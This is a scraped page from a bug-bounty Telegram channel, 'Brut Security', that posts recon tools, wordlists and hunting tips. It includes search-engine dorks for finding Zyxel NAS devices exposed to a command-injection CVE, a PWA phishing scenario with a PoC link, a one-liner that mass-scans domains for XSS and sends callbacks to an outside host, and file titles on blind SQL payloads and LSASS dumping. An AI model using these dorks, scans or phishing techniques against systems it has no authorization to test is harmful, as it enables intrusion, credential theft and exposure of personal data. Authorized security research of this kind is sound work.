Brut Security – Telegram
Brut Security
14.7K subscribers
914 photos
73 videos
287 files
970 links
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
Download Telegram
2FA Security Issues.pdf
1.5 MB
👍3
RSEScan

📣A command-line utility for interacting with the RSECloud. It allows you to fetch subdomains and IPs from certificates for a given domain or organization. A command-line utility for interacting with the RSECloud. It allows you to fetch subdomains and IPs from certificates for a given domain or organization.📣

🌐POC VIDEO🌐
🔗Download🔗
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥1
Brut Security pinned «RSEScan 📣A command-line utility for interacting with the RSECloud. It allows you to fetch subdomains and IPs from certificates for a given domain or organization. A command-line utility for interacting with the RSECloud. It allows you to fetch subdomains…»
Reconnaissance- Phase1.pdf
1.5 MB
☄️Bug Bounty Reconnaissance-Phase 1☄️
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
☄️Bug-Bounty-Wordlists☄️

📣A repository that includes all the important wordlists used while bug hunting.

🔗Link: https://github.com/YaS5in3/Bug-Bounty-Wordlists


#bugbounty #bugbountytips
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6
Top Useful Extension For Pentesting and Bug hunting
👍31
💥Bug Bounty Tip: Don't Overlook Image Endpoints!💥

👉Did you know 95% of hunters remove image files from their endpoint scans? Here's how Orwa found sensitive information by focusing on them:

1. Gather All Target Endpoints: Collect endpoints from your target.

2. Filter for Image Extensions: Use a simple command to isolate image URLs.

cat endpoints.txt | egrep 'jpg|jpeg|png' > results.txt

3. Check for Live URLs: Ensure the filtered image URLs are active.

4. Use a Screenshot Tool: Automate the process of taking screenshots of these URLs to quickly spot sensitive information.

ℹ️ Success Story by GodfatherOrwa:
-He found a passport image at app[.]com/xxxx/cdn/file/xxx.jpg.
- Visiting app[.]com/xxxx/cdn/ revealed an open directory listing.
- The result? Tons of exposed PII!

👌Always check image file endpoints (.jpg, .jpeg, .png, etc.). You might find more than you expect!

Happy hunting, everyone!

Credit: @godfatherorwa

#bugbountytips #bugbountytip #bugbounty
👍5
Brut Security pinned Deleted message
Blind SQL Payloads
🔥7👍2
Media is too big
VIEW IN TELEGRAM
⚠️CVE-2024-29973: Unauthorized command injection in Zyxel NAS devices⚠️

🔍This command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 and NAS542 devices could allow an unauthenticated attacker to execute some OS commands by sending a crafted HTTP POST request.

📌PoC: https://github.com/k3lpi3b4nsh33/CVE-2024-29973

📣Dorks:
🔽Hunter: product.name="ZyXEL NAS542"||http://product.name="ZyXEL NAS326"
🔼FOFA: app="NAS542" || app="ZYXEL-NAS326"
🔽SHODAN: http.noscript:"Zyxel NAS326"
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯61
This media is not supported in your browser
VIEW IN TELEGRAM
⚠️Progressive Web App (PWA) Phishing⚠️

📌Attack Scenario: A user lands on index.html and clicks the "Install Microsoft Application" button. The install app prompt appears and once it is installed by the user, the JavaScript embedded in index.html redirects the PWA window to the phishing page that hase a fake URL bar at the top (i.e. mrd0x.html). Ensure that you're testing this over HTTPS to avoid encountering issues.

📣Blog Link: https://mrd0x.com/progressive-web-apps-pwa-phishing

🔗POC: https://github.com/mrd0x/PWA-Phishing

⚠️This is simply to demonstrate how PWA phishing works. Don't use it for illegal purposes.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥31
🔼 One-Liner XSS 🔽

subfinder -dL domainlist1.txt | dnsx | shuf | (gau | | hakrawler) | anew | egrep -iv "\.(jpg|jpeg|gif|tif|tiff|png|ttf|woff|woff2|php|ico|pdf|noscript|txt|js)$" | urless | nilo | dalfox pipe -b https://xss.hunter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8👏1
Brut Security pinned «Keep checking my old Posts to continue your learning Process!»
Methods for Dump LSASS.pdf
33.4 MB
💥Methods for Dump LSASS💥
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
☄️KnoXSS XSS Payload - confirm?.(1)
🔍Credit- @lu3ky13

#bugbounty #bugbountytips
Please open Telegram to view this post
VIEW IN TELEGRAM
🫡4🤯2
Recon workflow.pdf
77.4 KB